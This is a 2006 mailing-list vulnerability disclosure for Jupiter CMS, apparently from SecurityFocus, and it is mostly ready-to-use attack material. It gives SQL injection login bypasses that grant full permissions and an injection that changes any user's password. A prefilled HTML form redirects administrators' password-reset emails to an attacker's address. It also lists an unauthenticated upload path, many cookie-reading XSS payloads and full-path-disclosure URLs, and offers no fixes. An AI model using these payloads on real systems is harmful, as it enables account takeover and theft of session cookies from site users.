Jupiter CMS Multiple injections Sep 15 2006 02:59AM
security soqor net
Hello,,

Jupiter CMS Sql injections ,full path and xss vulnerabilities

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

if magic_quotes_gpc = off

login with

user name :

' or id=1/*

or

' or authorization = 4/*

you will be loged in with full permission

-------------------------

index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*

You will be able to change the password for any user .. know his id and put it in the url.

--

or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators

<form method="post" action="http://localhost/jupiter/index.php?n=modules/register">

<table class="main" cellspacing="1" cellpadding="4" width="100%">

<tr class="head">

<td colspan="2" class="head">Forgot your password?</td>

</tr>

<tr>

<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>

<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security (at) soqor (dot) net [email concealed]',url,age,flag,location,registered,lastvisit,forum_l
astvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,
hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>

</tr>

<tr>

<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>

<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>

</tr>

<input type="hidden" name="a" value="3">

<input type="hidden" name="d" value="1">

</table>

</form>

put the user name value

Change security (at) soqor (dot) net [email concealed] to your email

' union select id,authorization ,username ,password ,'security (at) soqor (dot) net [email concealed]',url,age,flag,location,registered,lastvisit,forum_l
astvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,
hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*

/********************************************/

Upload any picture to their gallery

modules/galleryuploadfunction.php

picture path will be

gallery/albums/public/name.ext

/********************************************/

xss (Cross site scripting)

modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(d
ocument.cookie);</script>

modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(d
ocument.cookie);</script>

modules/register.php?is_guest=1&language[Register%20title]=<script>alert
(document.cookie);</script>

modules/register.php?is_guest=1&language[Register%20title2]=<script>aler
t(document.cookie);</script>

modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert
(document.cookie);</script>

modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(
document.cookie);</script>

modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert
(document.cookie);</script>

change the value for language[Mass-Email%20form%20desc(2-4)]

modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>
alert(document.cookie);</script>

modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>a
lert(document.cookie);</script>

modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>
alert(document.cookie);</script>

change the var value for language[Forgotten%20desc(2 - 5)]

modules/search.php?language[Search%20view%20desc]=<script>alert(document
.cookie);</script>

modules/search.php?language[Search%20view%20desc2]=<script>alert(documen
t.cookie);</script>

Change the value for language[Search%20view%20desc(2-8)]

/********************************************/

Full path

includes/functions.php

modules/register.php?is_guest=1

modules/online.php

modules/poll.php

modules/panel.php

modules/pm.php

modules/news.php

modules/templates_change.php

modules/users.php

modules/misc.php?a=1&is_webmaster=1

modules/masspm.php

modules/mass-email.php?subject_choice=1&message_choice=1&a=1

modules/main-nav.php

modules/login.php

modules/layout.php?is_webmaster=2

modules/hq.php

modules/forum.php

modules/forum-admin.php?n=modules/forum-admin&a=1

modules/events.php

modules/emoticons.php

modules/download.php

modules/blocks.php?is_webmaster=2

modules/ban.php

modules/badwords.php

modules/ads.php

modules/admin.php

/********************************************/

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus